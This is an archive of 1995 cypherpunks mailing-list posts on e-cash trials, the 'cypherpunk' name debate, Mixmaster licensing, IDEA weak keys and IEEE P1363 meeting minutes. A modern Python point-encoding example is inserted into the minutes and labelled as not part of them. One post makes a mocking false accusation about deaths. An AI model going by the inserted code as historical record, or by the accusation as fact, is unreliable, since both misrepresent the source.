          (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS;
          UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T
          MODEL 3600 TELEPHONE SECURITY DEVICE

Chapter 25:  Politics
          NATIONAL SECURITY AGENCY; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; PUBLIC KEY PARTNERS; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE;
          ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY
          GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES;
          FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues

AFTERWORD BY MATT BLAZE

Source Code
          DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
          WAKE

References



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 15 Sep 95 10:04:38 PDT
To: <cypherpunks@toad.com>
Subject: Re: More on ECheques (retry)
Message-ID: <9509151704.AA12852@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Gah - it's easy to click on 'send' before you really mean to

> You are welcome to test ECheques on our live floristry service.  To
> do this:
> 
> 1.  Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
> 2.  Follow the instructions for generating a key.
>        a) Generate Key  System/security/key gen (please use 512 bits)
>        b) Specify your user details Alter/my details (put in a bank a/c no)

If you received a phone call from someone you did not know, who asked you
for your bank account number, would you comply?

If a stranger handed you a floppy and asked you to run the binary on it,
while connected to the Internet, and give it your bank account number,
would you do so?

If email from an unknown person asked you to download a binary over the internet, 
and run it, giving it your bank account number, would you do it?

That's exactly what is being asked here.






Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer (Anonymous@freezone.remailer)
Date: Wed, 20 Sep 95 17:17:24 PDT
To: cypherpunks@toad.com
Subject: SMART CARDS, CREDIT CARDS, PAYMENT SYSTEMS
Message-ID: <9509201551476821@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 15 Sep 1995 09:14:45 -0400
To: cypherpunks@toad.com
From: anonymous@freezone.remailer
Subject: Smart Cards, Credit cards, Payment systems

URL: http://www.dice.ucl.ac.be/~dhem/card.html


Smart Cards, Credit cards, Payment systems.
   
   This page is under development.
     
_________________________________________________________________

   
   Card Europe
   DigiCash
   MasterCard
       Futur 1, 2
   Virtual Open Network Environment (V-ONE)
   MONDEX
   AT&T and GiroVend agree to promote smart card applications
   AT&T Universal Card Services
   ATT buyinfo
   ibd.ar.com/lists/comp/cypherpunks
   Discussions, mailing lists, and sites, Payment mechanisms designed for the Internet
   News items on information technology (Not especially Smart Cards)
   Electronic Cash, Tokens and Payments in the National Information Infrastructure
   Forum On Risks To The Public In Computers And Related Systems (ACM)
       The Risks Digest Volume 4: Issue 32
       The Risks Digest Volume 15
       The Risks Digest Volume 16
   SMI Finger Check -- Fingerprint Verifier
   DIGITAL SRC Research Reports
       Authentication and Delegation with Smart-cards
   Innovonics
   QC consultancy
   University of Wollongong: Centre for Computer Security Research
   SecureWare, Inc.
   OKI
   Telecom (Smart) Cards Museum (big)
   Buying Prepaid Calling Card
   S. Brands
   Cyberbank '95
   Electronic benefits transfer (EBT) in US
   NCSA/DTIC Security Seminar
   Power Broker
   First Union Corp. will offer stored-payment ''smart cards''
   Network Payment Mechanisms and Digital Cash
   PCMCIA Cards
   THE PREPAID & RECHARGEABLE PHONE CARD
   Cardservice International
       
     
_________________________________________________________________

   
   UCL crypto group
     
_________________________________________________________________

   
   Last update: 11 September 1995.
   Send any comment to: Dhem@dice.ucl.ac.be (J.-F. Dhem)
   
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RopeGun@alaska.net (Oren Tanay)
Date: Fri, 15 Sep 95 14:31:02 PDT
To: cypherpunks@toad.com
Subject: laptop passwords
Message-ID: <9509152130.AA18053@alaska.net>
MIME-Version: 1.0
Content-Type: text/plain


I've got a dilemma.
        2 laptops that I just purchased at a police auction have passwords,
from what I can tell they are passworded at the cmos level. I would normally
just pull out the battery and clear the cmos but these are laptops and I'm
not too comfortable about doing that.  Any ideas?

laptop1 -  Toshiba Satellite Pro T2400CT
laptop2 -  Epson Action Note 500 c

Oren Tanay
RopeGun Productions
  \\V//
   o o
    J
   +--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 13:34:24 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <ac7f317f0f0210043c20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:25 PM 9/15/95, Peter Trei wrote:

>Tim, I don't want to take your toy away, or minimize the achievements


It's not "my toy" for anyone to take away.

The burden of proof lies with those who want the name "Cypherpunks"
changed, not those who are happy to let things go as they've been going.

Look, you've written a couple of long pieces explaining why a more
conservative name would be better, I've written some pieces on why it's not
a very workable idea, and yet I doubt anyone on the list has changed their
views. Or at least only a very tiny fraction.

The point being that things gain inertia, just the way it is. History
counts. Names stick.

But if you and your follows wish to change things, go ahead and have a
schism. That's what the Protestants did, once they realized the Catholic
Church wouldn't be changing its system anytime soon.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 15 Sep 95 13:36:41 PDT
To: cypherpunks@toad.com
Subject: Re: SPAM bait
Message-ID: <9509152041.AA21715@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


To: janet.dove@ledip.py
Subject: Re:  ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Fri, 15 Sep 95 14:06:33 PDT
To: cypherpunks@toad.com
Subject: NTSC version BBC-4 show (cryptography/privacy)
Message-ID: <v02120d03ac7f9a9f43d6@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


I have a copy of the recent BBC 4 show on cryptography & privacy,
transferred from PAL to NTSC so it can be watched here.

Anyone who wants to borrow it (& lives in the SF Bay area) is welcome
to email/call me to arrange to borrow it.

**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 14:08:11 PDT
To: mix-l@jpunix.com (Mixmaster Mailing List)
Subject: Re: Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <ac7f99f70602100472cd@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


That is correct. The current code can not be recalled. That is part of why I
released it that way. So that I could not be coerced into withdrawing it.

        -Lance

At 12:48 PM 9/15/95, Futplex wrote:
>Anonymous writes:
># Consider this scenario ...  Mixmaster gets bought by the Acme
># Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
># version.  It's even FREE (for non-commercial use)!  But their
># "improvements" make it incompatible with previous versions, and so
># you have to upgrade.  The new "commercial" version comes with no
># SOURCE CODE, of course...
>
>Lance Cottrell writes:
>> 4) There will always be a free version of the client with source code.
>>
>> While I have not discussed it, I can not imagine that there would not also
>> be a free version of the server code (with source). Without remailers what
>> is the point of the client software?
>
>Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
>I suspect he may not have much legal leeway in this regard.
>
>With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
>Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or
>http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant
>distributions of Mixmaster, has some significant implications for any
>commercial development of Mixmaster. It's applicable to "the Program or any
>derivative work under copyright law: that is to say, a work containing the
>Program or a portion of it, either verbatim or with modifications and/or
>translated into another language".
>
>The GNU GPL specifies that:
>
>        2. You may modify your copy or copies of the Program or any portion of
>        it, and copy and distribute such modifications under the terms of
>        Paragraph 1 above, provided that you also do the following:
>        [...]
>        b) cause the whole of any work that you distribute or publish, that
>        in whole or in part contains the Program or any part thereof, either
>        with or without modifications, to be licensed at no charge to all
>        third parties under the terms of this General Public License (except
>        that you may choose to grant warranty protection to some or all
>        third parties, at your option).
>
>and that:
>
>        3. You may copy and distribute the Program (or a portion or
>        derivative of it, under Paragraph 2) in object code or executable
>        form under the terms of Paragraphs 1 and 2 above provided that you
>        also do one of the following:
>        a) accompany it with the complete corresponding machine-readable
>        source code, [...] or,
>        b) accompany it with a written offer, [...] to give any third party
>        free (except for a nominal charge for the cost of distribution) a
>        complete machine-readable copy of the corresponding source code, [...]
>
>So it looks to me as though Mixmaster source code will continue to be
>legally available, no matter what....
>
>Better informed interpretations are enthusiastically solicited.
>
>-Futplex <futplex@pseudonym.com>

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 19 Sep 95 10:53:26 PDT
To: cypherpunks@toad.com
Subject: Avoiding weak IDEA keys?
Message-ID: <9509151215.AA00774@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



At the CRYPTO '93 there was a presentation about weak
IDEA keys (page 224 of the proceedings). 

Does anybody know about IDEA implementations considering this
and trying to avoid weak keys, e.g. by using the modified key
schedule?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Greenberg <greenbes@netcom.com>
Date: Fri, 15 Sep 95 14:45:17 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
In-Reply-To: <ac7f317f0f0210043c20@[205.199.118.202]>
Message-ID: <Pine.3.89.9509151414.A23653-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




> 
> But if you and your follows wish to change things, go ahead and have a
> schism. That's what the Protestants did, once they realized the Catholic
> Church wouldn't be changing its system anytime soon.
> 
> --Tim May
> 

Hmmmm... If memory serves, a year or so ago there was just such a schism
when a prominent cypherpunk split off and formed the "cypherWONKS" list. 
The failure of that list can be attributed to one thing and one thing
alone: a concerted effort by YOU and your acolytes against it.  You refuse
to even mention this, which is all the proof any open-minded person needs. 
Now you are trying to stifle all open debate by doing it again. So, Mr.
May/Szabo (if that IS your name), why not come clean once and for all
about your role in the deaths of Vince Foster and Randy Weaver's wife, and
your part in the newly-emerging administration scandal: TENTACLE-gate. 

						Watch the skies,
						Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 11:52:27 PDT
To: cypherpunks@toad.com
Subject: Minutes of IEEE public-key standardization meeting
Message-ID: <9509151851.AA09047@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 15 Sep 1995 11:08:56 -0800
From: rschlafly@attmail.com (Roger  Schlafly)
Subject: Crypto '95 P1363 minutes
To: p1363@RSA.COM


                             MINUTES

                           IEEE P1363:
Standard for RSA, Diffie-Hellman, and Related Public-Key Cryptography


Burt Kaliski opened the meeting at 1:10 pm.  The announced agenda was:


  IEEE P1363: Standard for RSA, Diffie-Hellman and Related
                   Public-Key Cryptography

                       MEETING NOTICE

            Thursday, August 31, 1995, 1:00-6:00pm
            Friday, September 1, 1995, 9:00-6:00pm
         University of California, Santa Barbara, CA

This meeting of the P1363 working group, open to the public, will
focus on the editing of a draft standard for RSA, Diffie-Hellman
and other public-key cryptography. The meeting follows the CRYPTO
'95 conference, held August 27-31 at the same location.

AGENDA

    1. Approval of Agenda

    2. Approval of Minutes from May Meeting

    3. Officers' Reports

    4. Update on Patent Issues

    5. Proposals for New Sections

    6. Meeting Schedule

    7. Editorial Work (schedule to be determined based
       on availability of draft material)

    8. New Work Assignments

Depending on the amount of editorial work, the meeting may end sooner
than 6:00pm Friday.

If you'd like to participate, contact Burt Kaliski, the working group's
chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065.
Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: burt@rsa.com.

Draft sections and copies of previous minutes are available via
anonymous ftp to ftp.rsa.com in the "pub/p1363" directory. The working
group's electronic mailing list is <p1363@rsa.com>; to join, send e-mail
to <p1363-request@rsa.com>.

There will be a meeting fee, though the amount has not yet been
established, pending arrangements with the university. It will also be
possible for participants to arrange accommodations at the university.

DIRECTIONS (excerpted from the CRYPTO announcement)

The campus is located approximately two miles from the Santa Barbara
airport, which is served by several airlines, including American,
America West, United and US Air. All major rental car agencies are also
represented in Santa Barbara, and AMTRAK has rail connections to San
Francisco from the north and Los Angeles from the south. Santa Barbara
is approximately 100 miles north of the Los Angeles airport, and 350
miles south of San Francisco.

For more information on the CRYPTO '95 conference, contact Stafford
Tavares, the general chair, at (613) 545-2945 or <tavares@ee.queensu.ca>.

In attendance, we had:

    Terry Arnold, Vice Chair
    Eric Blossom
    Jean-Francois Dhem
   *Whitfield Diffie
    Carl Ellison
    Amos Fiat
    Walter Fumy
    John Gilmore
   *Roger Golliver
    Chris Gorsuch
    David Grawrock
    Stuart Haber
    Aleksandar Jurisic
   *Burt Kaliski, Chair
   *John Kennedy
    Katherine T. Kislitzin
    Judy Koeller
    Ray Kopsa
   *Michael Markowitz
   *Alfred Menezes
   *Mark Oliver
    Paul Van Oorschot
    Minghua Qu
   *Roger Schlafly, Secretary
    Sherry Shannon
   *Jerry Solinas
   *Scott Vanstone
    Michael J. Wiener
    Harold M. Wilensky
    Roger Zuccherato

Those marked with an asterisk were qualified to vote, having also
attended 2 of the last 3 meetings (and thus 3 of 4, including this
one).

Motion 1: (Arnold, Kennedy) The agenda is approved.  Passed, unanimously.

Motion 2: (Arnold, Markowitz) Approve the minutes.  Passed, unanimously.

Kaliski reported that he is still trying to get registered OID numbers
for us, but it will take the IEEE another six months to get its act
together.  We can proceed on the assumption that the numbers will be
filled in later.

Kaliski reported that the IEEE is setting up a web site to store drafts
of standards online.  The address is http://stdsbbs.ieee.org.  When we
(and IEEE) are ready, we will set up an area for our drafts.  We can
limit who can upload and download if we wish.

Motion 3: (Oliver, Arnold) Make online documents publicly accessible
to anyone.  Passed, unanimously.

Kaliski will set up a P1363 area on the SPA server, as soon as it is
feasible.

The other officers had nothing to report.

Kaliski gave us a patent update.  We still don't have the necessary
assurances.  One difficulty is the lawsuit between Cylink and RSA Data
Security which may drag on for a while.  There is also an arbitration
proceeding between the two companies, with a ruling expected in a few
weeks.

The application for a waiver from the IEEE patent policy is still
pending.  Schlafly suggested amending the application letter to
limit the waiver to the Stanford patents on the theory that the
situation with the Stanford patents is more likely to be resolved
in the near future.  (Among other things, the Stanford patents
expire much sooner than the MIT RSA patent.)  When support for this
position was weak, he proposed amending the application to make it
clear that there is a stronger case for a waiver on the Stanford, so
that if the IEEE chooses to reject our broad request, they will at
least know that we could live with a narrower waiver.  Others argued
that a broad waiver gives our committee maximum freedom, and that we
could decide later the extent to which we take advantage of the
waiver.

Motion 4: (Kennedy, Oliver) Leave waiver request as is.  Passed, 7-3.

Arnold raised the issue of the removal of a private key syntax from
the elliptic curve draft.

Motion 5: (Arnold, Gilmore) We introduce a representation of private
keys into the standard.
Passed, unanimously.

Motion 6: (Arnold, Markowitz) Archiving and protecting private keys
is outside our scope, and we should not include it in the body of
the standard.
Passed, unanimously.

This motion leaves open the possibility of having advisory material
on archiving private keys.

This issue also provoked a discussion of syntax alternatives to
ASN.1.  Ellison argued that ASN.1 has a corrupting influence on
the mind, and should be scrapped altogether.  Kaliski said that
there is no actual requirement that we use ASN.1, and that we
could just use bit strings if we wished.

No new sections were proposed.

The next meeting was scheduled for the Crown Plaza hotel in Toronto,
on Nov. 15-16, in conjunction with the Public Key Solutions (PKS)
conference sponsored by Mobius.

We discussed having the following meeting in conjunction with the
RSA Data Security conference.  That conference is at the Fairmount
hotel, San Francisco, Jan. 17-19.  Another possibility is in conjunction
with ISOC in Feb. 22-23 at San Diego.  Either way, the P1363 would
probably be the two days before.  We were unable to reach a consensus,
so we deferred the issue to the next meeting.

Markowitz assumed the role of treasurer again.  The meeting fee was
$60, or just $25 if only attending one day.  Money for the dorms was
also collected.

At the request of the IEEE editors, we are moving our documents to
Microsoft Word format.

Our outline is now as follows.

1. Overview, scope, purpose
2. Standards references
3. Definitions
4. Elliptic curves
5. Bibliography

Appendices
A. Mathematical background
B. Supporting algorithms
C. Test vectors
D. Known state of attacks
E. Random numbers
F. Hardware support

Arnold expressed doubt as to whether the hardware support section
was going to come together satisfactorily.  So we changed the name
of that section to "Other considerations" so that we could include
other miscellaneous remarks.

Ellison took over the random number section.  He wanted to ditch
some of the randomness tests as not being strong enough, and include
some other explanatory material.

At 3:00 we took a break until 3:35.

The rest of the meeting was devoted to a detailed discussion of
the elliptic curve draft.  Menezes handed out a new copy.

Solinas handed out a paper on elliptic curve point counting, to be
included in appendix B.  It gives a nice way of choosing a curve with
a predictable number of points.  To make it more complete, he will
add a couple of references, particularly to the forthcoming CRC
handbook of applied cryptography, by Menezes, Van Oorschot, and
Vanstone.

Vanstone suggested switching the elliptic curve spec to multiplicative
notation.  Mathematicians prefer to use an additive notation because
the curve is an abelian group.  However, it is very confusing for
cryptographers because the formulas are analogous to Diffie-Hellman
and Elgamal protocols where the principal operation is multiplication
in Zp.

Motion 7: (Kennedy, Menezes) Stay with additive notation for elliptic
curves, for consistency with the mathematical literature.
Passed, unanimously.

For various reasons, we decided that n, the order of the elliptic curve
base point, should be required to be prime.

Someone also thought "G" was better notation for the base point.

Kaliski questioned the block splitting scheme in the ECES.  Kennedy
said it scored high on the hokey meter.

At 9:10 Friday morning, the meeting resumed.

The treasurer reported collecting $1662.70.  This included $538.85
for dorm rooms and $1125 in IEEE fees.  Kaliski demonstrated a
cryptanalytic attack on these totals, as a way of verifying them.

Vanstone gave an explanation of ECES.  One rationale for the block
splitting scheme is that a typical elliptic curve uses 160 bits for
each of x and y.  A triple DES key is 168 bits.  A straightforward
scheme would only use x, and thus not be able to encrypt the whole
triple DES key.  Using y would give 320 bits, but y is (nearly) a function
of x, so there are some cryptographic subtleties in using y directly.
In the end, we weren't that comfortable with it, so we decided
to stick with a simpler one-block scheme.  The simpler scheme just
multiplies (or perhaps xors) the message by x.

We took a break at 10:45.

There was more criticism of ASN.1.  Ellison offered to construct
some simple data representations which would allow us to avoid
ASN.1.  Kaliski suggested that an elliptic curve point (x,y) with
possible compressed y could be represented by

        [ x bytes ]  00
        [ x bytes ]  01
        [ x bytes ]  80  [ y bytes]

That is, the last line is for the full x and y.  If y is compressed
down to one bit, the first or second line is used.

Kaliski argued against the signature schemes directly referencing
a hashing operation.  Someone may want to sign something other
than a hash value.  An implementation may want to conform without
having a hash function built-in.  Solinas objected that there
are risks to signing data other than hash values.  This issue
was not resolved.

Solinas complained that there are various parameters buried in
the draft without any indication as to how these are related to
overall security.  He volunteered to write some notes on how
the various parameters were related to each other.  How these
are incorporated is to be determined.

Someone pointed out we should check r = 0 or s = 0 in the signature
schemes.

At 12:20 we took a break for lunch, until 1:45.

Vanstone gave a talk and handout on key agreement protocols.
He showed how he and Menezes found weaknesses in other Diffie-Hellman
type protocols, and they proposed a new one that overcomes
the problems.  We all liked it.

We thought q and n should be part of the system parameter setup.

There was some discussion of optimal normal bases versus using
an irreducible polynomial.  We also discussed advantages of restricting
to p = 3 mod 4, and to curves with a = -3.

At 3:20 we took a break until 3:30.

Ellison handed out some introductory material on random numbers that
he wrote since taking over the job the day before.

The plan now is to have a draft standard at the next (Nov.) meeting,
and then to polish it up for ballot at the following meeting.

We adjourned at 4:20.
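
Kaliski's trailing-tag point format from the minutes above, worked through as an added example that is not part of the original minutes or of any P1363 draft. The toy curve (p = 10007, a = -3, b = 7), the two-byte field length and the use of the low bit of y as the compression bit are assumptions; decompression uses the square-root shortcut available when p = 3 mod 4.

```python
# Added example. Toy domain parameters, constructed for illustration only.
P_MOD = 10007      # field prime with P_MOD % 4 == 3
A = -3             # curve coefficient a = -3
B = 7              # constructed coefficient b (curve is non-singular)
FIELD_LEN = 2      # bytes needed for one field element

TAG_Y_BIT0, TAG_Y_BIT1, TAG_FULL = 0x00, 0x01, 0x80


def rhs(x):
    """Right-hand side x^3 + a*x + b of the curve equation, mod p."""
    return (x * x * x + A * x + B) % P_MOD


def on_curve(x, y):
    """True only for in-range coordinates that satisfy the curve equation."""
    return 0 <= x < P_MOD and 0 <= y < P_MOD and (y * y - rhs(x)) % P_MOD == 0


def sqrt_mod_p(v):
    """Square root for p = 3 mod 4: one exponentiation, then verify."""
    r = pow(v, (P_MOD + 1) // 4, P_MOD)
    if (r * r - v) % P_MOD != 0:
        raise ValueError("x is not the abscissa of a curve point")
    return r


def encode_point(x, y, compress=True):
    """[x bytes] 00 / [x bytes] 01 when compressed, [x bytes] 80 [y bytes] otherwise."""
    if not on_curve(x, y):
        raise ValueError("refusing to encode a point that is not on the curve")
    xb = x.to_bytes(FIELD_LEN, "big")
    if compress:
        return xb + bytes([TAG_Y_BIT1 if y & 1 else TAG_Y_BIT0])
    return xb + bytes([TAG_FULL]) + y.to_bytes(FIELD_LEN, "big")


def decode_point(data):
    """Parse either form and reject anything that is not a curve point.

    The tag follows x, so the parser must know FIELD_LEN from the domain
    parameters before it can tell where x ends.
    """
    if len(data) == FIELD_LEN + 1 and data[-1] in (TAG_Y_BIT0, TAG_Y_BIT1):
        x = int.from_bytes(data[:FIELD_LEN], "big")
        if x >= P_MOD:
            raise ValueError("x out of range")
        y = sqrt_mod_p(rhs(x))
        if y == 0 and data[-1] == TAG_Y_BIT1:
            raise ValueError("y = 0 has no odd root")
        if (y & 1) != data[-1]:
            y = P_MOD - y      # p is odd, so the two roots differ in parity
        return x, y
    if len(data) == 2 * FIELD_LEN + 1 and data[FIELD_LEN] == TAG_FULL:
        x = int.from_bytes(data[:FIELD_LEN], "big")
        y = int.from_bytes(data[FIELD_LEN + 1:], "big")
        if not on_curve(x, y):
            raise ValueError("decoded (x, y) is not on the curve")
        return x, y
    raise ValueError("unrecognised point encoding")


def sample_point():
    """First point found by scanning x upward (used as constructed test input)."""
    for x in range(1, P_MOD):
        try:
            return x, sqrt_mod_p(rhs(x))
        except ValueError:
            continue
    raise RuntimeError("no point found")


if __name__ == "__main__":
    px, py = sample_point()
    for form in (True, False):
        blob = encode_point(px, py, compress=form)
        print(blob.hex(), "->", decode_point(blob))
```

Both branches of the decoder end in a curve-membership check, so a peer cannot hand over an arbitrary (x, y) pair in the full form or an x with no matching y in the compressed form.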





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 15 Sep 95 12:15:22 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <9509151915.AA16093@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



Tim writes:

>Indeed, some people here have been calling themselves by various names
>("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise
>the terms "geek," "dweeb," and "nerd," and think anyone who calls themselves
>by these insults is not "reclaiming and deconstructing the labels of the
>oppressor class," as the slogan goes, but is merely insulting themselves.
>Blacks who call themselves "niggers," homosexuals who call themselves
>"queers," and computer programmers who call themselves "geeks" and "dorks"
>are all playing the same game.

I fail to see how you can write this, and then claim it's OK to call
yourself a 'punk'.

>A better approach is for the "conservatives" who want a "more conservative"
>name to simply do what I suggested: form a new group and name it what they
>like. They wouldn't have to quit this list, they would just be able to
>cleanly recruit for their new list.

>Seems simple to me. And honest. And less divisive than trying to change the
>name of a group with a long history (by modern standards) and with several
>well-known achievements.

Who is trying to be dishonest, and what are they trying to be dishonest
about? I'm really confused by this.

Tim, I don't want to take your toy away, or minimize the achievements
of the cypherpunks (among whom I somewhat presumptively include myself).

OK. Let's NOT drop the term 'cypherpunk'. However, I do think we need to
have available another term for 'people with our interests' if we're
going to have maximal effectiveness.

What follows is my original followup, written last night.

- ---------------------------------------------------------------

    I've gotten a number of responses to my post 'Cypherpunk considered
harmful.' It's pretty clear that a lot of people did not really
understand what I was getting at. This is my fault. I'll try to clarify.

    What is the situation on the ground, here in mid September 1995?

    It's utterly clear that the US and other governments are dead set
against the widespread use of strong, unencumbered crypto. 'They' are
using many different (and weak) pretexts to delay or prevent its
incorporation into commercial software.

    If there is a hidden state agenda, 'our' belief is it is that the
state wishes to retain its current ability to spy unseen on the
citizenry, wiretapping with or without warrants, and examine stored
information without the cooperation of the owner.

    The general 'cypherpunk viewpoint', if I may generalize, is 
diametrically opposite: It's not really a hidden agenda, since 
frequent rants make it pretty clear. 

    Since we're not a unified command and control system like the state,
different cypherpunks have different goals, but I hazard that most would
agree with:

    'Strong, unencumbered cryptography is an empowerment tool for the
electronic age; it strengthens the individual in relation to the state,
allowing him (or her) to communicate privately, and store his data as
securely as if it resided in his own head. The widespread use of strong
cryptography will lead to social changes that we regard as desirable.'
     
     If you accept this arguably paranoid vision of our situation, then
it's clear that we are in a battle for the hearts and minds of the
people: 

     The State wants to convince people that their safety and 
prosperity lies in trusting Big Brother to watch over and take care of
them, and nothing but danger lies outside of BB's line of sight. 

     The cypherpunks take a much more libertarian viewpoint; that the
state is already too strong and intrusive, and that cryptography will
not only allow us to engage in commerce and protect ourselves against
crime, it will also allow us to act outside of improper state control.

     But time is running out. 

     All the state has to do is convince people that strong unescrowed
encryption is needed only by criminals - if you trust the state, there
is no reason to object to it being able to listen in - after all, all
laws are reasonable, and the state won't listen in without a warrant.

     'We' have a harder task. We need to convince people that they need
encryption - it will protect us against criminals, snoops, and hackers,
and the state's proposals will not do this. It's a much more subtle
thesis, without the easy emotional hooks that can be exploited by the
state to promote its position.

      I don't think we can turn people into libertarians, and then get
them to adopt cryptography to protect themselves from the statists. At
least, not enough people to count in the short term, and the short term
is where we need to focus at the moment.

      I *do* think we can persuade people that they need cryptography to
protect themselves against criminals, and that the government's proposed
standards for key length limits and key escrow will make the crypto so
weak and insecure that it will cause more crime than it will prevent.

      That's a critical point - that the individual can, without
difficulty, use cryptography to protect him or herself against criminals
more effectively than he could by relying on the state.

     The memes we want to propagate are 

1. "I need strong unescrowed cryptography to protect myself against
criminals."

     If we can convince a large portion of the population of this (and
we have truth on our side), we'll be well on our way.

2. "The government's initiatives on encryption, while they may be
well-intentioned, are worse than useless, and will endanger me and my
loved ones."

     If we can get this through the public's collective head as well,
we'll have won the battle.


     This goal is where the 'cypherpunk considered harmful' title comes
from. I want to propagate these ideas.

     If I go up to an average person and tell them "The State is working
to ensure that it can spy on your every communication, and can't be
trusted to follow its own rules for doing so. Use cryptography to help
promote cryptoanarchy!", he will usually dismiss me as a nutcase.

     If I say "Criminals and hackers can tap your internet
communications, defraud your cell phone account, eavesdrop on your
calls, impersonate you, steal your credit card numbers, and spy on your
business secrets. I can tell you how you can easily prevent this", then
he is interested, and wants to know more.

     Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
nutcases for many people, and are a barrier to getting our ideas
across. I'm not saying this pigeonholing is correct - in fact I despise
people who judge a book by its cover, but so many people DO make such
snap judgements that we need to take this into account when talking to
the general public.

     For those who have responded, *I* do not have a problem with the
term cypherpunk. However, I know that there are many people who do, 
people we want on our side. 

     I propose that in communicating with the cryptographic laity, we
should be emphasizing the anti-crime aspects of crypto, as well as its
enabling impact on commerce and the American software industry. 

     We'll get a lot more converts with this approach than we would by
emphasizing the political aspects of cypherpunk, no matter how important
we think they are.

     Think about it. Which future would you rather see:

1. Lots of people demanding strong unescrowed crypto for what you  
   consider rather peripheral and politically unaware reasons, which
   you have educated them in.

2. Unescrowed crypto banned, with those who promote considered
   aiders and abettors of the four horsemen, (but boy are they
   ideologically pure!).

Peter Trei

I probably won't see any responses till Monday. I'm going for a 
weekend at a resort on Lake Winnipesaukee. If you need me, I'll be
in the hot tub. :-) 

     





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP
J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK
V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3
zsyK3fej+IQ=
=YqDH
-----END PGP SIGNATURE-----

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Fri, 15 Sep 95 15:34:56 PDT
To: greenbes@netcom.com (Steven Greenberg)
